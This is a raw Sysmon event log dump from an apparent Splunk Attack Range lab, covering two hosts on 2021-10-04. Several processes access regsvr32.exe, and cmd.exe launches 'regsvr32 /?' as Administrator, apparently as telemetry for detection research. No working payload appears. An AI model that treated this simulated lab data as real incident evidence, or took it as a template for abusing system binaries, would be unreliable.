07:50:42.155{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103538Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103537Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103536Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103535Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103534Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103533Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103532Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103531Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.140{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103530Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.093{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103529Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.093{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103528Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103527Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103526Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.030{58E9C193-B24B-615A-CA01-00000000FC01}7802912C:\Windows\system32\cmd.exe{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:42.042{58E9C193-B252-615A-CC01-00000000FC01}104C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32 /?C:\Users\Administrator\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x8000000000000000103547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:43.593{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B6C3A062267D5853201F74E66432E66,SHA256=72F27F8D83E75C52843A223E1E6AEE36933B1A960E7211CC48D9BF624D7240F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081419Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:43.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25865E57D75463673939AC841CDA69F3,SHA256=7EF2B681EACB3EA870DEB0D0CB43716CEFF51B79A7816B7BA4E769F4732CBD1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:43.077{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584884200421C4F8C3352F6FA3B487F2,SHA256=882A7A684C15B7A5FBA24ED9CCAC6AF472CDB2A7239F75F7530FC0E7D6F666BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:43.077{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5AAC630B913DDCE7A21AA8A617543CC5,SHA256=133B5FAE1202EF733F56434730ECBB8EF239853505EFF786CCF4021FED92451C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:44.593{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B2130EE7213A4F6903D4AC57D482333,SHA256=98D1E644F79690EB60D1FC4CDE4693265FE6E0D270D98CD771AA2C55DFDF76DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081420Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:44.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290A13A00DB220227E5E822ED650F852,SHA256=76817EAC4E6B46B0FD05948B0B3B6FC6F7CC2EDD1CF51FB59292247C73F5E182,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081422Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:42.755{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50025-false10.0.1.12-8000- 23542300x800000000000000081421Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:45.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=863F0A3486DB8C661F2487CCFA20B88F,SHA256=29B91393452667BADDAF29488F00D733A455A4AB0DC9EF8BAC7895F64FF19BC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:45.593{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6305FC7F308681CF31109521C0E9A3DB,SHA256=C5A27E1ECE86AF0A44DA97CF9E05164DE1E8D0BBBD2DEAA576A08B9650900144,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:45.377{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49525-false10.0.1.12-8000- 23542300x8000000000000000103550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:46.593{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD477BF6334CDB01C8EAFF6D3AF3CB33,SHA256=0274B0D0E3D68A2A53A4C0EEBC636B62F3C3DC9BCA77D82FD2FD133A5FAED4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081423Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:46.327{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91B5DECABCF9EAFC0E1AA512145F74A3,SHA256=F2E76BC59D59A28FCAD4AA2F38E64CCB15F4A485F59ED92F2D7FDE77E4131D0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:47.608{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE374276B78793023BD5B6BF121EB34,SHA256=1FD18FDD970F23DCD458EEBC794A46F4D043659EA2C728CEAB5F2B6186EC9664,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081424Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:47.343{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BB63DDC593E04C9616FB62C787E1D0,SHA256=0A45F50CB9E254DFA619856CFCDD1B1C396C1F5D19C74C11F55D800A590A6CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103553Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:48.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F49EB7549E1F5BA6A9BB85DF71DAD0E,SHA256=2139D1837A46D875AE9F3F5CA707FF6FB6068468B6B27FBC75BE390139B069DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081425Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:48.437{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAD9F6897FBADD0760373A1FBC41112,SHA256=718B070D78377DEA20238A593C8463D65FF9BD11CE53B0354FBA35FCA2019168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081426Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:49.499{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=631512A8019255E8285CF00A7F3FB3A3,SHA256=E2F0E97A712F0C558F3695C961DC7501F83577FBBAC66AB2C72CC7E32B6F005D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:49.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=470DAFAE0214DBA5787632A09054A795,SHA256=7FE83E43C04B1755E7429C3887BCA2B1479B663AE74B93DBB37D8093A8C50420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081427Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:50.515{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3805BCDD42316720F5E384B0B1AA5869,SHA256=DCD9B365D69162E7C70EB14C3D7E188E3144A2672782DDEC09595356C55900AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:50.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD1C5AE0390A219504B40BBA31D5910C,SHA256=761F4CA47485D02BAE291E503E7B66A18FDAD46243359AD791F8BEAF09D1CBD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:51.655{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66572FFD87E1AD15770AA2236E937A05,SHA256=F752FB7529E9EBDC71DF02C89E9DC078E4AC5BB5BD2B7F62F0AEA823BB6F3BA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081429Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:51.515{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC818DDE9B07F7288CF6BB5BCFC052D6,SHA256=7DEEA125857C4F071A4FA7DD4CEF50EC95E3CA2F478AB2A4E4D3BE7EC2364CE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081428Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:48.708{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50026-false10.0.1.12-8000- 354300x8000000000000000103565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:51.408{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49526-false10.0.1.12-8000- 23542300x8000000000000000103564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:52.671{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811F221549320CA57D98E06E2EB16B7B,SHA256=C862DBF94835A3BB2DA856914E1B58D99FBD184B31F877F4DBC1212CA3D19866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081430Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:52.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program 